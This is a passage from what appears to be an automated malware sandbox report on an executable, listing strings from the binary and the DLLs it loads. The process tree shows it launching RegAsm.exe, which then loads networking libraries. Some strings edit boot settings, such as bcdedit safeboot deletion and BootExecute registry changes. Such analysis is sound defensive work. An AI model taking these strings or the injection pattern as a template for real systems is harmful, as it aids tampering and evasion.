Express Gen 2 x16Slot type: PCI Express Gen 3Slot type: PCI Express Gen 3 x1Slot type: PCI Express Gen 3 x2Slot type: PCI Express Gen 3 x4Slot type: PCI Express Gen 3 x8Slot type: PCI Express Gen 3 x16Slot type: UnknownIn Use: YES In Use: NO Name: AcerPackard bell0SNID: Dell0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-Service tag: EnumSystemFirmwareTablesKernel32.dllGetSystemFirmwareTableKernel32.dllSelect Vendor, Name, IdentifyingNumber from Win32_ComputerSystemProductROOT\CIMV2VendorTo be filled Name IdentifyingNumberSelect Manufacturer, Product, SerialNumber, Version from Win32_BaseBoardManufacturerTo be filled Product Version SerialNumberSelect SerialNumber from Win32_BIOSSerialNumberRoot\CIMV2Select * From Win32_PrinterCancelAllJobsReturnValue-ContinueRepair-DesktopWatermarkConfig/UpdateVT-DesktopWatermark-ImmunizeConfig/MRSAPP/apfHKLM\SOFTWARE\Carifred\UVK - Ultra virus killerRebootActionsReset_CHKDSK-RestoreBoot/StopResetApps-StopResetApps/UpdateFromZip/PostUpdateActions\UVKRebootExecLog.txtReset_UDS-ReplaceFile-SReplaceFile-SReplaceFile-ExpandFile-SExpandFile-SExpandFile\UVK_en.exe HKLM\SYSTEM\CurrentControlSet\Control\Session Managerautocheck autochk *BootExecute\cmd.exe /c chkntfs /x \boot.inioperating systems /safeboot:minimal /sos /bootlog /noguiboot /safeboot:network /sos /bootlog /noguibootoperating systems\bcdedit.exe /deletevalue {current} safeboot user...
                    Source: WyPb2uVZ1P.exeString found in binary or memory: 66MHz CapableSlot type: AGPSlot type: AGP 2XSlot type: AGP 4XSlot type: PCI-XSlot type: AGP 8XSlot type: M.2 Socket 1-DP (Mechanical Key A)Slot type: M.2 Socket 1 - SD(Mechanical Key E)Slot type: M.2 Socket 2 (Mechanical Key B)Slot type: M.2 Socket 3 (Mechanical Key M)Slot type: MXM Type ISlot type: MXM Type IISlot type: MXM Type III (standard connector)Slot type: MXM Type III (HE connector)Slot type: MXM Type IVSlot type: MXM 3.0 Type ASlot type: MXM 3.0 Type BSlot type: PCI Express Gen 2 SFF - 8639Slot type: PCI Express Gen 3 SFF - 8639Slot type: PCI Express Mini 52 - pin (CEM spec. 2.0) with bottom-side keep-outsSlot type: PCI Express Mini 52-pin (CEM spec. 2.0) without bottom-side keep-outsSlot type: PCI Express Mini 76 - pin (CEM spec. 2.0). Corresponds to Display - Mini cardSlot type: PC-98/C20Slot type: PC-98/C24Slot type: PC-98/ESlot type: PC-98/Local BusSlot type: PC-98/CardSlot type: PCI ExpressSlot type: PCI Express x1Slot type: PCI Express x2Slot type: PCI Express x4Slot type: PCI Express x8Slot type: PCI Express x16Slot type: PCI Express Gen 2Slot type: PCI Express Gen 2 x1Slot type: PCI Express Gen 2 x2Slot type: PCI Express Gen 2 x4Slot type: PCI Express Gen 2 x8Slot type: PCI Express Gen 2 x16Slot type: PCI Express Gen 3Slot type: PCI Express Gen 3 x1Slot type: PCI Express Gen 3 x2Slot type: PCI Express Gen 3 x4Slot type: PCI Express Gen 3 x8Slot type: PCI Express Gen 3 x16Slot type: UnknownIn Use: YES In Use: NO Name: AcerPackard bell0SNID: Dell0123456789ABCDEFGHIJKLMNOPQRSTUVWXYZ-Service tag: EnumSystemFirmwareTablesKernel32.dllGetSystemFirmwareTableKernel32.dllSelect Vendor, Name, IdentifyingNumber from Win32_ComputerSystemProductROOT\CIMV2VendorTo be filled Name IdentifyingNumberSelect Manufacturer, Product, SerialNumber, Version from Win32_BaseBoardManufacturerTo be filled Product Version SerialNumberSelect SerialNumber from Win32_BIOSSerialNumberRoot\CIMV2Select * From Win32_PrinterCancelAllJobsReturnValue-ContinueRepair-DesktopWatermarkConfig/UpdateVT-DesktopWatermark-ImmunizeConfig/MRSAPP/apfHKLM\SOFTWARE\Carifred\UVK - Ultra virus killerRebootActionsReset_CHKDSK-RestoreBoot/StopResetApps-StopResetApps/UpdateFromZip/PostUpdateActions\UVKRebootExecLog.txtReset_UDS-ReplaceFile-SReplaceFile-SReplaceFile-ExpandFile-SExpandFile-SExpandFile\UVK_en.exe HKLM\SYSTEM\CurrentControlSet\Control\Session Managerautocheck autochk *BootExecute\cmd.exe /c chkntfs /x \boot.inioperating systems /safeboot:minimal /sos /bootlog /noguiboot /safeboot:network /sos /bootlog /noguibootoperating systems\bcdedit.exe /deletevalue {current} safeboot user...
                    Source: WyPb2uVZ1P.exeString found in binary or memory: % Method 2: If method 1 does not work, you can prevent file types from being associated with some apps. In order to block an app, click or tap the corresponding tile below. Already blocked apps have a "Stop sign" icon overlayed. To unblock the same app, just click or tap it again. Changes are instantly applied. Please associate the desired file types with your preferred programs before blocking, or you may not be able to do it afterwards..+\\Microsoft\\Edge\\Application\\msedge.exeMicrosoft\.MicrosoftEdge_.+microsoft\.windowscommunicationsapps_.+Microsoft\.Windows.Photos_.+Microsoft\.ZuneVideo_.+Microsoft\.ZuneMusic_.+Microsoft\.MSPaint_.+(Microsoft\.WindowsNotepad_.+)|(\\Windows\\(System32\\)?notepad.exe)HKLM64\Software\ClassesAppX\shell\open\command\\Software\ClassesHKU\AppX\Application\ApplicationNameAppUserModelID\shell\open\command\IMAGEIMAGEIMAGEIMAGEIMAGEIMAGEIMAGEIMAGE4.7.0.0http://www.carifred.com/stop_resetting_my_apps/about.php?ver=http://www.carifred.com/stop_resetting_my_apps/http://www.carifred.com/donate/?product=StopResettingMyAppsSorry, method 1 failed. please try method 2.IMAGEYour file associations were successfully reset and fixed.
                    Source: WyPb2uVZ1P.exeString found in binary or memory: % Method 2: If method 1 does not work, you can prevent file types from being associated with some apps. In order to block an app, click or tap the corresponding tile below. Already blocked apps have a "Stop sign" icon overlayed. To unblock the same app, just click or tap it again. Changes are instantly applied. Please associate the desired file types with your preferred programs before blocking, or you may not be able to do it afterwards..+\\Microsoft\\Edge\\Application\\msedge.exeMicrosoft\.MicrosoftEdge_.+microsoft\.windowscommunicationsapps_.+Microsoft\.Windows.Photos_.+Microsoft\.ZuneVideo_.+Microsoft\.ZuneMusic_.+Microsoft\.MSPaint_.+(Microsoft\.WindowsNotepad_.+)|(\\Windows\\(System32\\)?notepad.exe)HKLM64\Software\ClassesAppX\shell\open\command\\Software\ClassesHKU\AppX\Application\ApplicationNameAppUserModelID\shell\open\command\IMAGEIMAGEIMAGEIMAGEIMAGEIMAGEIMAGEIMAGE4.7.0.0http://www.carifred.com/stop_resetting_my_apps/about.php?ver=http://www.carifred.com/stop_resetting_my_apps/http://www.carifred.com/donate/?product=StopResettingMyAppsSorry, method 1 failed. please try method 2.IMAGEYour file associations were successfully reset and fixed.
                    Source: WyPb2uVZ1P.exeString found in binary or memory: -update_target-arch-install_path-allowed_types-restart-params-product-update_target <target_path>-install_path <install_path>-allowed_types <type1;type2>-arch x64|x86-params "application parameters"-product <product_id>string too longinvalid string positionHj.RegValUnknownMBR.ForgedCritical.ProcessSuspicious.StartupRoot.KeyloggerRoot.FilterHidden.From.RegistryHidden.From.SCMProc.InjectedProc.RunPECloud.GenericCloud.Unknown.OrphanHidden.ADSHj.ShortcutMal.AppLockExploitBad.ExtensionCloud.SafeGood.ValueKnown.GoodExcludedRogueKiller RTPIs.StoppedProvides real-time protection for RogueKiller Anti-Malware.RegVal.MalformedrkrtserviceDocLock.BlockedDocLock.DataLeak.BlockedClipprot.BlockedSigned.SafeSuspicious.ShadowCopySuspicious.RebootSafeSuspicious.DigisigMozilla/5.0 (Windows NT 6.1; WOW64; rv:50.0) Gecko/20100101 Firefox/50.0[0-9A-F]{16}.metaProc.HiddenProc.SvchostMalPESuspicious.PathSCNMal.PowershellDELMal.MshtaMal.WscriptPUPPUMHj.NameHj.HostsFile.ForgedRegVal.BrokRegKey.Brok
                    Source: WyPb2uVZ1P.exeString found in binary or memory: EDGE-add-on
                    Source: WyPb2uVZ1P.exeString found in binary or memory: dialog-help-icon
                    Source: WyPb2uVZ1P.exeString found in binary or memory: filedialog-start-icon
                    Source: WyPb2uVZ1P.exeString found in binary or memory: P_q_stylesheet_parent1styleSheetParentDestroyed()QToolTip::setTipRect: Cannot pass null widget if rect is set/* */qtooltip_labelno screens available, assuming 24-bit coloractivate-on-singleclickalignmentarrow-keys-navigate-into-childrenbackward-iconbutton-layoutcd-iconcombobox-list-mousetrackingcombobox-popupcomputer-icondesktop-icondialog-apply-icondialog-cancel-icondialog-close-icondialog-discard-icondialog-help-icondialog-no-icondialog-ok-icondialog-open-icondialog-reset-icondialog-save-icondialog-yes-icondialogbuttonbox-buttons-have-iconsdirectory-closed-icondirectory-icondirectory-link-icondirectory-open-icondither-disable-textdockwidget-close-icondownarrow-icondvd-iconetch-disabled-textfile-iconfile-link-iconfiledialog-backward-iconfiledialog-contentsview-iconfiledialog-detailedview-iconfiledialog-end-iconfiledialog-infoview-iconfiledialog-listview-iconfiledialog-new-directory-iconfiledialog-parent-directory-iconfiledialog-start-iconfloppy-iconforward-icongridline-colorharddisk-iconhome-iconicon-sizeleftarrow-iconlineedit-password-characterlineedit-password-mask-delaymdi-fill-space-on-maximizemenu-scrollablemenubar-altkey-navigationmenubar-separatormessagebox-critical-iconmessagebox-information-iconmessagebox-question-iconmessagebox-text-interaction-flagsmessagebox-warning-iconmouse-trackingnetwork-iconopacitypaint-alternating-row-colors-for-empty-arearightarrow-iconscrollbar-contextmenuscrollbar-leftclick-absolute-positionscrollbar-middleclick-absolute-positionscrollbar-roll-between-buttonsscrollbar-scroll-when-pointer-leaves-controlscrollview-frame-around-contentsshow-decoration-selectedspinbox-click-autorepeat-ratespincontrol-disable-on-boundstabbar-elide-modetabbar-prefer-no-arrowstitlebar-close-icontitlebar-contexthelp-icontitlebar-maximize-icontitlebar-menu-icontitlebar-minimize-icontitlebar-normal-icontitlebar-shade-icontitlebar-unshade-icontoolbutton-popup-delaytrash-iconuparrow-icon
                    Source: WyPb2uVZ1P.exeString found in binary or memory: P_q_stylesheet_parent1styleSheetParentDestroyed()QToolTip::setTipRect: Cannot pass null widget if rect is set/* */qtooltip_labelno screens available, assuming 24-bit coloractivate-on-singleclickalignmentarrow-keys-navigate-into-childrenbackward-iconbutton-layoutcd-iconcombobox-list-mousetrackingcombobox-popupcomputer-icondesktop-icondialog-apply-icondialog-cancel-icondialog-close-icondialog-discard-icondialog-help-icondialog-no-icondialog-ok-icondialog-open-icondialog-reset-icondialog-save-icondialog-yes-icondialogbuttonbox-buttons-have-iconsdirectory-closed-icondirectory-icondirectory-link-icondirectory-open-icondither-disable-textdockwidget-close-icondownarrow-icondvd-iconetch-disabled-textfile-iconfile-link-iconfiledialog-backward-iconfiledialog-contentsview-iconfiledialog-detailedview-iconfiledialog-end-iconfiledialog-infoview-iconfiledialog-listview-iconfiledialog-new-directory-iconfiledialog-parent-directory-iconfiledialog-start-iconfloppy-iconforward-icongridline-colorharddisk-iconhome-iconicon-sizeleftarrow-iconlineedit-password-characterlineedit-password-mask-delaymdi-fill-space-on-maximizemenu-scrollablemenubar-altkey-navigationmenubar-separatormessagebox-critical-iconmessagebox-information-iconmessagebox-question-iconmessagebox-text-interaction-flagsmessagebox-warning-iconmouse-trackingnetwork-iconopacitypaint-alternating-row-colors-for-empty-arearightarrow-iconscrollbar-contextmenuscrollbar-leftclick-absolute-positionscrollbar-middleclick-absolute-positionscrollbar-roll-between-buttonsscrollbar-scroll-when-pointer-leaves-controlscrollview-frame-around-contentsshow-decoration-selectedspinbox-click-autorepeat-ratespincontrol-disable-on-boundstabbar-elide-modetabbar-prefer-no-arrowstitlebar-close-icontitlebar-contexthelp-icontitlebar-maximize-icontitlebar-menu-icontitlebar-minimize-icontitlebar-normal-icontitlebar-shade-icontitlebar-unshade-icontoolbutton-popup-delaytrash-iconuparrow-icon
                    Source: WyPb2uVZ1P.exeString found in binary or memory: QToolTipclassstyle1styleDestroyed(QObject*)Could not parse application stylesheetstyleSheet* {Could not parse stylesheet of object %pQDockWidgetTitleButtonqt_dockwidget_closebuttonqt_dockwidget_floatbutton_q_stylesheet_minw_q_stylesheet_minh_q_stylesheet_maxw_q_stylesheet_maxh does not have a property named cannot design property named _q_styleSheetWidgetFont1objectDestroyed(QObject*)mNXicon-sizetitlebar-menu-icontitlebar-minimize-icontitlebar-maximize-icontitlebar-close-icontitlebar-normal-icontitlebar-shade-icontitlebar-unshade-icontitlebar-contexthelp-icondockwidget-close-iconmessagebox-information-iconmessagebox-warning-iconmessagebox-critical-iconmessagebox-question-icondesktop-icontrash-iconcomputer-iconfloppy-iconharddisk-iconcd-icondvd-iconnetwork-icondirectory-open-icondirectory-closed-icondirectory-link-iconfile-iconfile-link-iconfiledialog-start-iconfiledialog-end-iconfiledialog-parent-directory-iconfiledialog-new-directory-iconfiledialog-detailedview-iconfiledialog-infoview-iconfiledialog-contentsview-iconfiledialog-listview-iconfiledialog-backward-icondirectory-icondialog-ok-icondialog-cancel-icondialog-help-icondialog-open-icondialog-save-icondialog-close-icondialog-apply-icondialog-reset-icondiscard-icondialog-yes-icondialog-no-iconuparrow-icondownarrow-iconleftarrow-iconrightarrow-iconbackward-iconforward-iconhome-iconlineedit-password-characterlineedit-password-mask-delaydither-disabled-textetch-disabled-textactivate-on-singleclickshow-decoration-selectedgridline-coloropacitycombobox-popupcombobox-list-mousetrackingmenubar-altkey-navigationmenu-scrollablemenubar-separatormouse-trackingspinbox-click-autorepeat-ratespincontrol-disable-on-boundsmessagebox-text-interaction-flagstoolbutton-popup-delayscrollview-frame-around-contentsscrollbar-contextmenuscrollbar-leftclick-absolute-positionscrollbar-middleclick-absolute-positionscrollbar-roll-between-buttonsscrollbar-scroll-when-pointer-leaves-controltabbar-elide-modetabbar-prefer-no-arrowsdialogbuttonbox-buttons-have-iconsmdi-fill-space-on-maximizearrow-keys-navigate-into-childrenpaint-alternating-row-colors-for-empty-areaqt_fontDialog_sampleEditqt_
                    Source: WyPb2uVZ1P.exeString found in binary or memory: QToolTipclassstyle1styleDestroyed(QObject*)Could not parse application stylesheetstyleSheet* {Could not parse stylesheet of object %pQDockWidgetTitleButtonqt_dockwidget_closebuttonqt_dockwidget_floatbutton_q_stylesheet_minw_q_stylesheet_minh_q_stylesheet_maxw_q_stylesheet_maxh does not have a property named cannot design property named _q_styleSheetWidgetFont1objectDestroyed(QObject*)mNXicon-sizetitlebar-menu-icontitlebar-minimize-icontitlebar-maximize-icontitlebar-close-icontitlebar-normal-icontitlebar-shade-icontitlebar-unshade-icontitlebar-contexthelp-icondockwidget-close-iconmessagebox-information-iconmessagebox-warning-iconmessagebox-critical-iconmessagebox-question-icondesktop-icontrash-iconcomputer-iconfloppy-iconharddisk-iconcd-icondvd-iconnetwork-icondirectory-open-icondirectory-closed-icondirectory-link-iconfile-iconfile-link-iconfiledialog-start-iconfiledialog-end-iconfiledialog-parent-directory-iconfiledialog-new-directory-iconfiledialog-detailedview-iconfiledialog-infoview-iconfiledialog-contentsview-iconfiledialog-listview-iconfiledialog-backward-icondirectory-icondialog-ok-icondialog-cancel-icondialog-help-icondialog-open-icondialog-save-icondialog-close-icondialog-apply-icondialog-reset-icondiscard-icondialog-yes-icondialog-no-iconuparrow-icondownarrow-iconleftarrow-iconrightarrow-iconbackward-iconforward-iconhome-iconlineedit-password-characterlineedit-password-mask-delaydither-disabled-textetch-disabled-textactivate-on-singleclickshow-decoration-selectedgridline-coloropacitycombobox-popupcombobox-list-mousetrackingmenubar-altkey-navigationmenu-scrollablemenubar-separatormouse-trackingspinbox-click-autorepeat-ratespincontrol-disable-on-boundsmessagebox-text-interaction-flagstoolbutton-popup-delayscrollview-frame-around-contentsscrollbar-contextmenuscrollbar-leftclick-absolute-positionscrollbar-middleclick-absolute-positionscrollbar-roll-between-buttonsscrollbar-scroll-when-pointer-leaves-controltabbar-elide-modetabbar-prefer-no-arrowsdialogbuttonbox-buttons-have-iconsmdi-fill-space-on-maximizearrow-keys-navigate-into-childrenpaint-alternating-row-colors-for-empty-areaqt_fontDialog_sampleEditqt_
                    Source: WyPb2uVZ1P.exeString found in binary or memory: Gstandardbutton-help-32.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: standardbutton-help-128.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: media-stop-16.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: media-stop-32.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: Gstandardbutton-help-16.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: process-stop
                    Source: WyPb2uVZ1P.exeString found in binary or memory: media-playback-start
                    Source: WyPb2uVZ1P.exeString found in binary or memory: media-playback-stop
                    Source: WyPb2uVZ1P.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/standardbutton-help-16.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-24.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-24.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/media-stop-32.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/standardbutton-help-32.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/standardbutton-help-128.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-32.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/stop-32.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: :/qt-project.org/styles/commonstyle/images/media-stop-16.png
                    Source: WyPb2uVZ1P.exeString found in binary or memory: <!--StartFragment-->
                    Source: WyPb2uVZ1P.exeString found in binary or memory: text-decoration: underline overline line-through color: background-color: vertical-align:middletopbottom text-transform:uppercase; text-transform:lowercase; font-variant:small-caps; word-spacing:%" align="right" align="center" align="justify" style="float: float: left; right; border-style:dotteddashedsoliddot-dashdot-dot-dashgrooveridgeinsetoutset page-break-before:always; page-break-after:always; font-family:&quot; margin-top: margin-bottom: margin-left: margin-right:<a name=""></a><a href=""><span style="<imgsrcwidthheight style="vertical-align: middle;" style="vertical-align: top;" />[\na]<br /></span></a> dir='rtl'-qt-paragraph-type:empty; -qt-block-indent: text-indent: -qt-user-state: line-height: min-height: line-spacing:%;<ol<ul<ul type="circle"<ul type="square"<ol type="a"<ol type="A"<ol type="i"<ol type="I"margin-top: 0px; margin-bottom: 0px; margin-left: 0px; margin-right: 0px; -qt-list-indent: \22\27 -qt-list-number-prefix: -qt-list-number-suffix: <li<hr/><pre<p<!--StartFragment--><!--EndFragment--></pre></li></ol></ul>bgcolor
                    Source: WyPb2uVZ1P.exeString found in binary or memory: tab-stops
                    Source: WyPb2uVZ1P.exeString found in binary or memory: tab-stop
                    Source: WyPb2uVZ1P.exeString found in binary or memory: mimetypeurn:oasis:names:tc:opendocument:xmlns:manifest:1.0manifest1.2version/text/xmlcontent.xmlMETA-INF/manifest.xmlfile-entrymedia-typefull-pathtable-columnnumber-columns-repeatedtable-rowtable-cellnumber-columns-spannednumber-rows-spannedT%1style-namelist-itemlistL%1pp%1spanc%1line-breaktabimageautomatic-stylesparagraphfamilyparagraph-propertiesstartQTextOdfWriter: unsupported paragraph alignment; margin-topmargin-bottommargin-leftmargin-righttext-indentbreak-beforebreak-afterkeep-togethertab-stopstab-stoppositiontext-propertiesSanstext-transformuppercaselowercasecapitalizesmall-capsfont-variantletter-spacingword-spacingsingletext-line-through-typetext-underline-colordashdash-dotwave0%-100%text-outlinelist-level-style-numbernum-formatnum-suffixnum-prefixlist-level-style-bulletbullet-charlevellist-level-properties%1mmspace-befores%1section-propertiestable-propertiespaddingpadding-toppadding-bottompadding-leftpadding-rightautomaticurn:oasis:names:tc:opendocument:xmlns:office:1.0urn:oasis:names:tc:opendocument:xmlns:text:1.0urn:oasis:names:tc:opendocument:xmlns:style:1.0urn:oasis:names:tc:opendocument:xmlns:xsl-fo-compatible:1.0urn:oasis:names:tc:opendocument:xmlns:table:1.0urn:oasis:names:tc:opendocument:xmlns:drawing:1.0http://www.w3.org/1999/xlinkurn:oasis:names:tc:opendocument:xmlns:svg-compatible:1.0QTextOdfWriter::writeAll: the device can not be opened for writingofficefodrawxlinkdocument-contentbody
                    Source: WyPb2uVZ1P.exeString found in binary or memory: [Updater::LaunchUpdate::Client] Starting software update (%ls, %ls), restart = %d -params " -restartx64x86 -arch " -update_target " -product "; -allowed_types "-install_path "Updater.exe[Updater::StartUpdate::Server] Unable to download target (%ls)[Updater::StartUpdate::Server] Terminating existing process (%ls:%lu)/silent /norestart /forcecloseapplications[Updater::StartUpdate::Server] Starting installer (%ls), success = %d[Updater::StartUpdate::Server] Replaced target with updated binary (%ls)[Updater::StartUpdate::Server] Unable to replace target with updated binary (%ls), %luhttps://download.adlice.com/api?action=download&app=%ls&type=setuphttps://download.adlice.com/api?action=download&app=%ls&type=portable_x64https://download.adlice.com/api?action=download&app=%ls&type=portable_x86https://licensing.adlice.com/api/v1/index.php/config/licensing/expiration_date/config/licensing/typeTRIAL_TECH[Licensing::GetRequest] Obtaining license state for id,%ls | machine,%ls...idkeyinstanceplatform 64 bits 32 bitsyes?action=check[Licensing::GetRequest] Unable to get response from server?action=getinstances[Licensing::GetActivations] Unable to get response from server?action=removeinstance[Licensing::DeactivateInstanceRequest] Properly removed instance,%ls[Licensing::DeactivateInstanceRequest] Unable to get response from serverisvalidactivation_timeexpiration_timeerror_msgerror_codeinstances_remaininginstances_maxlicense_emailproduct_idexpired[Licensing::ActivateTrial] Trial activated[Licensing::ActivateTrial] Unable to activate trial, already used[Licensing::DeactivateTrial] Trial deactivated, will not be available anymore[Licensing::DeactivateTrial] Unable to deactivate trial, not used yet[Licensing::Remove] Properly removed license[Licensing::CheckLicense] No license found, missing info[Licensing::CheckLicense] Trial found[Licensing::CheckLicense] Unable to contact server, using internal information : date,expired%04d-%02d-%02d %02d:%02d:%02d[Licensing::CheckLicense] Unable to contact the server[Licensing::CheckLicense] No more activations[Licensing::CheckLicense] License key is expired (%ls)[Licensing::CheckLicense] Invalid key or id[Licensing::CheckLicense] License key is about to expire (%ls)[Licensing::CheckLicense] License is for wrong productinstancescreatedactivation_platformhttps://download.adlice.com/api/?action=read&app=%ls&type=available_version[VersionManager::Software::CheckIfOutdated] Software is outdated (%ls => %ls)[VersionManager::Software::CheckIfOutdated] Software up to date (%ls)[VersionManager::Software::CheckIfOutdated] DNS error while checking version, flushing DNS cache...1kXnBBX6SEXgvOVhttps://stats.adlice.comROGUEKILLER_TECHUCHECK_TECHDIAG_TECHDIFFVIEW[Telemetry::Send] Sending telemetry dataoperating_system64 bits32 bitsbitstrialtechnicianpremium_versionpersonalDATA%s/api.php?action=submit&application=%s{"Error":"Posted data"}[Telemetry::Send] Unable to send telemetry data[Telemetry::SendRTP] Sending RTP telemetry data[Telemetr
                    Source: WyPb2uVZ1P.exeString found in binary or memory: set-addPolicy
                    Source: WyPb2uVZ1P.exeString found in binary or memory: id-cmc-addExtensions
                    Source: WyPb2uVZ1P.exeString found in binary or memory: iphlpapi.dllif_nametoindexkernel32LoadLibraryExA\/AddDllDirectoryt
                    Source: WyPb2uVZ1P.exeString found in binary or memory: Unable to complete request for channel-process-startup
                    Source: WyPb2uVZ1P.exeString found in binary or memory: in-addr.arpa
                    Source: WyPb2uVZ1P.exeString found in binary or memory: edu.bsflog.bredu.btonjuku.chiba.jpotoyo.kochi.jpbenevento.itedu.ciin-addr.arpaedu.bzart.brhistory.museumbrothermed.ecmeteorapp.comagr.bredu.cnmed.eenaka.hiroshima.jpkamimine.saga.jpedu.corishiri.hokkaido.jpedu.cushinjo.nara.jpnesset.noedu.cwclick
                    Source: WyPb2uVZ1P.exeString found in binary or memory: Africa/Addis_Ababa
                    Source: unknownProcess created: C:\Users\user\Desktop\WyPb2uVZ1P.exe "C:\Users\user\Desktop\WyPb2uVZ1P.exe"
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"Jump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: pdh.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: netapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: wtsapi32.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: samcli.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: version.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Users\user\Desktop\WyPb2uVZ1P.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: apphelp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: aclayers.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sfc_os.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: webio.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeSection loaded: ntasn1.dllJump to behavior
